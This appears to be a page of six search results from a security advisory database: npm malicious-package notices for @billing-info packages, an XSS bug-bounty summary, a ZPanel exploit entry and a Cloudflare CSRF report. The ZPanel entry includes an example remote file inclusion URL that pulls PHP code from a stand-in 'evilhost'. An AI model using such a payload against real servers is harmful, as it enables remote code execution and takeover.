6 matches found
Malicious code in @billing-info/common (npm)
The package @billing-info/common was found to contain malicious code...
Malicious code in @billing-info/react (npm)
The package @billing-info/react was found to contain malicious code...
MAL-2025-7120 Malicious code in @billing-info/react (npm)
The package @billing-info/react was found to contain malicious code...
Uber: [manage.jumpbikes.com] Blind XSS on Jump admin panel via user name
By setting a user's name to an XSS payload, a user was able to inject JavaScript which was executed on the administrative panel for Jump bikes, allowing complete compromise of the panel, exposing user activity, personal information and billing information...
ZPanel <= 2.5 - Remote SQL Injection Exploit
No description provided by source. Tested and working /str0ke It is possible to include arbitrary file: local - in version ZPanel = 2.5 beta 10, remote - in ZPanel 2.0. exploit for v 2.0 http://localhost/zpanel/zpanel.php?page=http://evilhost/shell where http://evilhost/shell.php - evil php code...
Cloudflare: CSRF and No password requirement in this URL Billing Info
An attacker can launch requests on his victim's behalf on the billing info page. There is a requirement of CSRF token on this page https://www.cloudflare.com/billing-information Awaiting your reply...